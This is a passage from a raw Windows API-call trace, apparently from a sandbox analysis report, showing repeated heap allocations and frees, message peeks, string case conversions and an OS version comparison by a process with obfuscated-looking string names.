hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0199.936] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0199.936] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0199.936] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cd8 | out: hHeap=0x25c0000) returned 1 [0199.936] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6aa8 | out: hHeap=0x25c0000) returned 1 [0199.936] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bc8 | out: hHeap=0x25c0000) returned 1 [0199.936] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3b50 | out: hHeap=0x25c0000) returned 1 [0199.937] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f18 | out: hHeap=0x25c0000) returned 1 [0199.937] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0199.937] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0199.937] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0199.937] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0199.937] CharUpperBuffW (in: lpsz="OSVersion", cchLength=0x9 | out: lpsz="OSVERSION") returned 0x9 [0199.937] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WIN_7", cchCount1=5, lpString2="WIN_2000", cchCount2=8) returned 3 [0199.937] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0199.937] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0199.937] PeekMessageW (in: lpMsg=0x8bf050, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf050) returned 0 [0199.937] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0199.937] PeekMessageW (in: lpMsg=0x8bf050, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf050) returned 0 [0199.937] PeekMessageW (in: lpMsg=0x8bf050, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf050) returned 0 [0199.937] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0199.937] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9dc8 [0199.937] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1758 [0199.938] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b13c8 [0199.938] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fd8 [0199.938] CryptAcquireContextA (in: phProv=0x8befe0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x8befe0*=0xad63f8) returned 1 [0199.939] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x2416270 [0199.939] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e30 [0199.939] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1748 [0199.939] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9dc8 [0199.939] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fd8 [0199.939] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ee8 [0199.939] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b13d8 [0199.939] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ee8 | out: hHeap=0x25c0000) returned 1 [0199.939] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0199.939] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fd8 | out: hHeap=0x25c0000) returned 1 [0199.939] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fd8 [0199.939] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ee8 [0199.939] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa230 [0199.939] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b13d8 [0199.939] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa230 | out: hHeap=0x25c0000) returned 1 [0199.939] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0199.939] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ee8 | out: hHeap=0x25c0000) returned 1 [0199.940] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ee8 [0199.940] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa230 [0199.940] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9db0 [0199.940] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b13d8 [0199.940] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9db0 | out: hHeap=0x25c0000) returned 1 [0199.940] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0199.940] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa230 | out: hHeap=0x25c0000) returned 1 [0199.940] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa230 [0199.940] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9db0 [0199.940] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa110 [0199.940] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b13d8 [0199.940] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa110 | out: hHeap=0x25c0000) returned 1 [0199.940] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0199.940] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9db0 | out: hHeap=0x25c0000) returned 1 [0199.940] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9db0 [0199.940] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa110 [0199.940] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa068 [0199.940] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b13d8 [0199.940] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa068 | out: hHeap=0x25c0000) returned 1 [0199.940] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0199.941] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa110 | out: hHeap=0x25c0000) returned 1 [0199.941] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa110 [0199.941] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa068 [0199.941] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f78 [0199.941] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b13d8 [0199.941] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f78 | out: hHeap=0x25c0000) returned 1 [0199.941] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0199.941] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa068 | out: hHeap=0x25c0000) returned 1 [0199.941] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0199.941] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0199.941] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0199.941] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0199.941] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0199.941] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3b50 | out: hHeap=0x25c0000) returned 1 [0199.941] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9df8 | out: hHeap=0x25c0000) returned 1 [0199.941] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0199.941] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa050 | out: hHeap=0x25c0000) returned 1 [0199.941] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cd8 | out: hHeap=0x25c0000) returned 1 [0199.941] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa908 | out: hHeap=0x25c0000) returned 1 [0199.942] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac9f0 | out: hHeap=0x25c0000) returned 1 [0199.942] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9a68 | out: hHeap=0x25c0000) returned 1 [0199.942] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1e8 | out: hHeap=0x25c0000) returned 1 [0199.942] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1a0 | out: hHeap=0x25c0000) returned 1 [0199.942] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ea0 | out: hHeap=0x25c0000) returned 1 [0199.942] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9648 | out: hHeap=0x25c0000) returned 1 [0199.942] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa008 | out: hHeap=0x25c0000) returned 1 [0199.942] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9bd0 | out: hHeap=0x25c0000) returned 1 [0199.942] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa158 | out: hHeap=0x25c0000) returned 1 [0199.942] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d68 | out: hHeap=0x25c0000) returned 1 [0199.942] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7e8 | out: hHeap=0x25c0000) returned 1 [0199.942] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0f8 | out: hHeap=0x25c0000) returned 1 [0199.942] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e58 | out: hHeap=0x25c0000) returned 1 [0199.942] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa200 | out: hHeap=0x25c0000) returned 1 [0199.942] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa098 | out: hHeap=0x25c0000) returned 1 [0199.942] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa968 | out: hHeap=0x25c0000) returned 1 [0199.942] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa260 | out: hHeap=0x25c0000) returned 1 [0199.942] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0199.942] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0199.942] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0199.942] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bc8 | out: hHeap=0x25c0000) returned 1 [0199.943] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f18 | out: hHeap=0x25c0000) returned 1 [0199.943] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x2416490 [0199.943] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2416270 | out: hHeap=0x25c0000) returned 1 [0199.943] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0199.943] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1bc8 [0199.943] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1848 [0199.943] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1778 [0199.943] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e10 [0199.943] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18f8 [0199.943] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f18 [0199.943] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0199.943] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c08 [0199.943] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa260 [0199.943] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0199.943] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa260 | out: hHeap=0x25c0000) returned 1 [0199.943] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0199.943] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f18 | out: hHeap=0x25c0000) returned 1 [0199.943] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0199.943] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0199.944] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0199.944] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0199.944] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bc8 | out: hHeap=0x25c0000) returned 1 [0199.944] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d820 [0199.944] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0199.944] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3b50 [0199.944] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1bc8 [0199.944] CharUpperBuffW (in: lpsz="A1300D00639", cchLength=0xb | out: lpsz="A1300D00639") returned 0xb [0199.944] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3b50 | out: hHeap=0x25c0000) returned 1 [0199.944] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bc8 | out: hHeap=0x25c0000) returned 1 [0199.944] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f18 [0199.944] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b1bc8 [0199.944] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0199.944] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa260 [0199.944] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1848 [0199.944] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1778 [0199.944] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa968 [0199.944] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa098 [0199.944] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18f8 [0199.944] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa200 [0199.945] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0199.945] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa200 | out: hHeap=0x25c0000) returned 1 [0199.945] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa098 | out: hHeap=0x25c0000) returned 1 [0199.945] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa968 | out: hHeap=0x25c0000) returned 1 [0199.945] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0199.945] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0199.945] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa968 [0199.945] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3b50 [0199.945] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa098 [0199.945] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1848 [0199.945] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa098 | out: hHeap=0x25c0000) returned 1 [0199.945] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6508 [0199.945] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa098 [0199.945] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0199.945] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0199.946] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1778 [0199.946] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18f8 [0199.946] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa200 [0199.946] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e58 [0199.946] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c08 [0199.946] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0f8 [0199.946] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0199.946] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c08 [0199.946] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a08 [0199.946] CharUpperBuffW (in: lpsz="SSA1300D00639", cchLength=0xd | out: lpsz="SSA1300D00639") returned 0xd [0199.946] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a08 | out: hHeap=0x25c0000) returned 1 [0199.946] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0199.946] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0f8 | out: hHeap=0x25c0000) returned 1 [0199.946] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e58 | out: hHeap=0x25c0000) returned 1 [0199.946] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa200 | out: hHeap=0x25c0000) returned 1 [0199.946] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0199.946] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0199.946] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d860 [0199.946] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0199.947] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d860 | out: hHeap=0x25c0000) returned 1 [0199.947] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0199.947] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1778 [0199.947] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa200 [0199.947] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e58 [0199.947] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18f8 [0199.947] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0f8 [0199.947] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0199.947] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0f8 | out: hHeap=0x25c0000) returned 1 [0199.947] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e58 | out: hHeap=0x25c0000) returned 1 [0199.947] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa200 | out: hHeap=0x25c0000) returned 1 [0199.947] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0199.947] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1778 [0199.947] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0199.947] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0199.947] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0199.947] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa098 | out: hHeap=0x25c0000) returned 1 [0199.948] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6508 | out: hHeap=0x25c0000) returned 1 [0199.948] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0199.948] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3b50 | out: hHeap=0x25c0000) returned 1 [0199.948] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa968 | out: hHeap=0x25c0000) returned 1 [0199.948] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bc8 | out: hHeap=0x25c0000) returned 1 [0199.948] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f18 | out: hHeap=0x25c0000) returned 1 [0199.948] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa260 | out: hHeap=0x25c0000) returned 1 [0199.948] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0199.948] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0199.948] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d820 | out: hHeap=0x25c0000) returned 1 [0199.948] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0199.948] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7e0 | out: hHeap=0x25c0000) returned 1 [0199.948] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0199.948] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3b50 [0199.948] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1bc8 [0199.949] CharUpperBuffW (in: lpsz="A610080612A", cchLength=0xb | out: lpsz="A610080612A") returned 0xb [0199.949] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3b50 | out: hHeap=0x25c0000) returned 1 [0199.949] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bc8 | out: hHeap=0x25c0000) returned 1 [0199.949] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aca50 [0199.949] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0199.949] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0199.949] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1bc8 [0199.949] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1848 [0199.949] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa260 [0199.949] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f18 [0199.949] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1778 [0199.949] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa968 [0199.949] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0199.949] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1778 [0199.949] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3b50 [0199.949] CharUpperBuffW (in: lpsz="SSA610080612A", cchLength=0xd | out: lpsz="SSA610080612A") returned 0xd [0199.949] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3b50 | out: hHeap=0x25c0000) returned 1 [0199.949] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, 